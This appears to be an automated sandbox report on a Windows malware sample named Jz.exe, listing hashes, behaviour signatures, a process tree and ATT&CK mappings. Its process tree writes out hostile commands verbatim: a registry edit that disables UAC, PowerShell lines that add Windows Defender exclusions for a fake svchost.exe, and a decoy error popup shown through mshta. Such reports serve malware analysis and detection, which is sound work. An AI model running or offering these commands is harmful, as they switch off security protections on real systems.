Analysis
-
max time kernel
34s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
16/04/2024, 00:24
Static task
static1
Behavioral task
behavioral1
Sample
Jz.exe
Resource
win10v2004-20240412-en
Errors
General
-
Target
Jz.exe
-
Size
7.5MB
-
MD5
cf7974f3af7e1307a4c325750febb201
-
SHA1
8b1695eb2481872694ac785ba0a14c8e1bb7398c
-
SHA256
9d2ad8c13ed60d88296433fd3b911995589ff90c476f4ec028596f43f1ac9fe3
-
SHA512
150895aaf679304c6715368561e8435f6290fcf714f98dac1f0714e6057304708c6524ed1d323426822b765a2e6d578fc618628d1f9ba998afb6564109600612
-
SSDEEP
196608:XdgqoyUWq8D+w448SSwzxzgjboADM8IaeTCRI:FawN8SXz+YUIRCRI
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2924-104-0x000000001DF80000-0x000000001DF8E000-memory.dmp disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation Jz.exe Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation svchost.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe -
Executes dropped EXE 1 IoCs
pid Process 2924 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2924 svchost.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x0007000000023270-8.dat agile_net behavioral1/memory/2924-16-0x00000000009B0000-0x00000000010B6000-memory.dmp agile_net -
resource yara_rule behavioral1/files/0x000700000002340c-24.dat themida behavioral1/memory/2924-25-0x00007FFC4E9E0000-0x00007FFC4F564000-memory.dmp themida behavioral1/memory/2924-31-0x00007FFC4E9E0000-0x00007FFC4F564000-memory.dmp themida behavioral1/memory/2924-64-0x00007FFC4E9E0000-0x00007FFC4F564000-memory.dmp themida behavioral1/memory/2924-102-0x00007FFC4E9E0000-0x00007FFC4F564000-memory.dmp themida behavioral1/memory/2924-103-0x00007FFC4E9E0000-0x00007FFC4F564000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2924 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2324 powershell.exe 2324 powershell.exe 3992 powershell.exe 3992 powershell.exe 2948 powershell.exe 2948 powershell.exe 4076 powershell.exe 4076 powershell.exe 2924 svchost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2924 svchost.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeShutdownPrivilege 2924 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2924 svchost.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 1292 wrote to memory of 2796 1292 Jz.exe 86 PID 1292 wrote to memory of 2796 1292 Jz.exe 86 PID 1292 wrote to memory of 2924 1292 Jz.exe 89 PID 1292 wrote to memory of 2924 1292 Jz.exe 89 PID 2796 wrote to memory of 1924 2796 cmd.exe 90 PID 2796 wrote to memory of 1924 2796 cmd.exe 90 PID 2796 wrote to memory of 3400 2796 cmd.exe 91 PID 2796 wrote to memory of 3400 2796 cmd.exe 91 PID 2796 wrote to memory of 2364 2796 cmd.exe 92 PID 2796 wrote to memory of 2364 2796 cmd.exe 92 PID 2796 wrote to memory of 1452 2796 cmd.exe 93 PID 2796 wrote to memory of 1452 2796 cmd.exe 93 PID 2796 wrote to memory of 1736 2796 cmd.exe 94 PID 2796 wrote to memory of 1736 2796 cmd.exe 94 PID 2796 wrote to memory of 3152 2796 cmd.exe 95 PID 2796 wrote to memory of 3152 2796 cmd.exe 95 PID 2796 wrote to memory of 1940 2796 cmd.exe 96 PID 2796 wrote to memory of 1940 2796 cmd.exe 96 PID 2796 wrote to memory of 1016 2796 cmd.exe 97 PID 2796 wrote to memory of 1016 2796 cmd.exe 97 PID 2796 wrote to memory of 4048 2796 cmd.exe 98 PID 2796 wrote to memory of 4048 2796 cmd.exe 98 PID 2796 wrote to memory of 3320 2796 cmd.exe 99 PID 2796 wrote to memory of 3320 2796 cmd.exe 99 PID 2796 wrote to memory of 4132 2796 cmd.exe 101 PID 2796 wrote to memory of 4132 2796 cmd.exe 101 PID 3320 wrote to memory of 4124 3320 cmd.exe 103 PID 3320 wrote to memory of 4124 3320 cmd.exe 103 PID 4132 wrote to memory of 2368 4132 cmd.exe 104 PID 4132 wrote to memory of 2368 4132 cmd.exe 104 PID 2924 wrote to memory of 2324 2924 svchost.exe 113 PID 2924 wrote to memory of 2324 2924 svchost.exe 113 PID 2924 wrote to memory of 3992 2924 svchost.exe 115 PID 2924 wrote to memory of 3992 2924 svchost.exe 115 PID 2924 wrote to memory of 2948 2924 svchost.exe 117 PID 2924 wrote to memory of 2948 2924 svchost.exe 117 PID 2924 wrote to memory of 4076 2924 svchost.exe 119 PID 2924 wrote to memory of 4076 2924 svchost.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\Jz.exe"C:\Users\Admin\AppData\Local\Temp\Jz.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\z.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\system32\chcp.comchcp.com 4373⤵PID:1924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:3400
-
-
C:\Windows\system32\find.exefind3⤵PID:2364
-
-
C:\Windows\system32\find.exefind3⤵PID:1452
-
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\ProgramData\z.bat"3⤵PID:1736
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\ProgramData\z.bat"3⤵PID:3152
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\ProgramData\z.bat"3⤵PID:1940
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\ProgramData\z.bat"3⤵PID:1016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp3⤵PID:4048
-
-
C:\Windows\system32\cmd.execmd.exe /c mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"3⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The instruction at 0x00000000771034FB referenced memory at 0x00000000771034FB. The required data was not placed into memory because of an I/O error status of 0x0000428. Click on OK to terminate the program', 0, 'Application Error', 0+16);close()"4⤵PID:4124
-
-
-
C:\Windows\system32\cmd.execmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
PID:2368
-
-
-
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.0MB
MD56a1120e0851cf90cf23cd75c016206aa
SHA19962964a5435cf5b6f842830abb45effa1b26829
SHA256851cf739d5cf8f8b153127c5bcad620b093e6c343c44cbf4860c2fbc1eae3da2
SHA512ca57d7f8ca0d527f4781b8f8e6b9ae3d494be46f4bab0ce2a379ec608557cda1468e73db66e9159b2c67b7e279d3e5e2b1a18f39e48e0a75839c4c6469461909
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
20KB
MD577946ef866ba3e46fb161bc52214c616
SHA120a53a00be7f4c76e3a1b02eb82675f7b8e77a0c
SHA2560562794443d5322e9271dbdce3af9b3ba5e14e831077796552f0d507e836c48f
SHA512b5671ee7de190613ff6095b564283c5b689008c79eab91ab39d95241dfed797ca61ee196bebbac4d481e5c0e4330bc6de40d7486f4d7eb8e0fcb01a734e1cbdb
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD5e5663972c1caaba7088048911c758bf3
SHA13462dea0f9c2c16a9c3afdaef8bbb1f753c1c198
SHA2569f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e
SHA512ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc
-
Filesize
944B
MD5e8478294527bc11b50f13186fc7c114e
SHA14f183fdc2b56fdaea9001248fc89aa748af257c4
SHA256dde84811ceb2d1ebcf5b3d6128d0ccce673bb1a5324bffd444300a00c60f32a5
SHA51272bda9eb9a4199043bbf538af4a30eea44e23efeafcaa0ad9e83ab18ed37823fafe8d4e833afe5f686c30f2ed46cce2ecf16c34bf6a2f4cdc09e711568197655
-
Filesize
4.2MB
MD505b012457488a95a05d0541e0470d392
SHA174f541d6a8365508c794ef7b4ac7c297457f9ce3
SHA2561f77a0749ac730500f203b8c4d072587923ac679e184a3859aeb855c2a2e7d8d
SHA5126d6e7b838d4425d49ac8d3738135374ef5357f0677b07cecb7afbf5feddc1997bf6dce68d48787eff8a74c4728def8880c8f01842eda35b5815fb561fa401ae6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82